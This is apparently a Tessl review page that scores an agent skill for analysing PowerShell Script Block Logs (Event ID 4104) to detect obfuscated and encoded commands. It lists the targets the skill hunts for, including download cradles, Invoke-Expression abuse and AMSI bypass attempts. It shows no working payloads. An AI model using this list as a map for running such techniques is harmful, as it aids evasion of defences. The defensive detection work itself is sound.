analyzing-powershell-script-block-logging
Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques. Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
72
66%
Does it follow best practices?
Impact
Pending
No eval scenarios have been run
Passed
No known issues
Optimize this skill with Tessl
npx tessl skill review --optimize ./skills/analyzing-powershell-script-block-logging/SKILL.mdQuality
Discovery
82%Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a highly specific and technically detailed description that excels at naming concrete actions and including domain-appropriate trigger terms for security forensics analysts. Its main weakness is the absence of an explicit 'Use when...' clause, which would help Claude know exactly when to select this skill over others. The description is well-written in third person and avoids vague language.
Suggestions
Add an explicit 'Use when...' clause, e.g., 'Use when the user asks to analyze EVTX files, investigate PowerShell execution logs, hunt for obfuscated scripts, or perform forensic analysis of Event ID 4104 logs.'
| Dimension | Reasoning | Score |
|---|---|---|
Specificity | Lists multiple specific concrete actions: parsing PowerShell Script Block Logs (Event ID 4104), extracting and reconstructing multi-block scripts, applying entropy analysis and pattern matching, detecting Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts. | 3 / 3 |
Completeness | The 'what' is thoroughly covered with specific capabilities and techniques. However, there is no explicit 'Use when...' clause or equivalent trigger guidance telling Claude when to select this skill, which caps this dimension at 2 per the rubric guidelines. | 2 / 3 |
Trigger Term Quality | Excellent coverage of natural keywords a security analyst would use: 'PowerShell', 'Script Block Logs', 'Event ID 4104', 'EVTX', 'obfuscated commands', 'encoded payloads', 'living-off-the-land', 'Base64', 'Invoke-Expression', 'AMSI bypass', 'download cradles'. These are highly specific and natural terms in the threat hunting/forensics domain. | 3 / 3 |
Distinctiveness Conflict Risk | Extremely distinct niche: Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files with specific detection techniques. This is unlikely to conflict with any other skill due to its highly specialized forensic/security focus and precise technical scope. | 3 / 3 |
Total | 11 / 12 Passed |
Implementation
50%Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
The skill provides a reasonable overview of PowerShell Script Block Log analysis with some concrete code snippets, but falls short on full actionability—key detection logic is described rather than implemented, and the referenced `scripts/agent.py` is unexplained. The workflow lacks validation checkpoints important for forensic analysis, and the prerequisites/when-to-use sections contain generic filler that wastes tokens.
Suggestions
Replace the prose detection heuristics (step 4) with executable Python code showing actual pattern matching against ScriptBlockText, including entropy calculation
Provide a complete executable example for multi-block script reconstruction rather than just describing the approach in prose
Add validation checkpoints: verify EVTX file opens correctly, confirm Event ID 4104 events exist, validate reconstructed scripts are complete (MessageNumber matches MessageTotal)
Remove or significantly trim the 'When to Use' and 'Prerequisites' sections—Claude doesn't need to be told when SOC analysts need structured procedures or that Python 3.8+ is required
| Dimension | Reasoning | Score |
|---|---|---|
Conciseness | The 'When to Use' section is somewhat generic and padded (e.g., 'When SOC analysts need structured procedures for this analysis type' adds little). Prerequisites like 'Familiarity with security operations concepts' are unnecessary for Claude. However, the core instructions are reasonably tight. | 2 / 3 |
Actionability | There are some concrete elements (pip install command, code snippet for Base64 decoding, CLI invocation), but the detection heuristics in step 4 are described rather than implemented with executable code. The multi-block reconstruction example is described in prose without actual executable code showing the concatenation logic. The main script invocation references `scripts/agent.py` without explaining what it is or how to create it. | 2 / 3 |
Workflow Clarity | Steps 1-5 provide a reasonable sequence, but there are no validation checkpoints. There's no guidance on verifying that EVTX parsing succeeded, no error handling for malformed events, and no feedback loop for when detection heuristics produce false positives or miss entries. For a security analysis workflow involving potentially complex multi-block reconstruction, validation steps are important. | 2 / 3 |
Progressive Disclosure | Content is organized with headers and examples, but everything is inline in a single file. The detection heuristics, MITRE ATT&CK mappings, and report generation could benefit from references to separate detailed files. The skill is moderate in length but could be better structured with clear pointers to deeper resources. | 2 / 3 |
Total | 8 / 12 Passed |
Validation
90%Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 10 / 11 Passed
Validation for skill structure
| Criteria | Description | Result |
|---|---|---|
frontmatter_unknown_keys | Unknown frontmatter key(s) found; consider removing or moving to metadata | Warning |
Total | 10 / 11 Passed | |
- Repository
- mukul975/Anthropic-Cybersecurity-Skills
- Commit
888bbe4
- Reviewed
Table of Contents
Is this your skill?
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.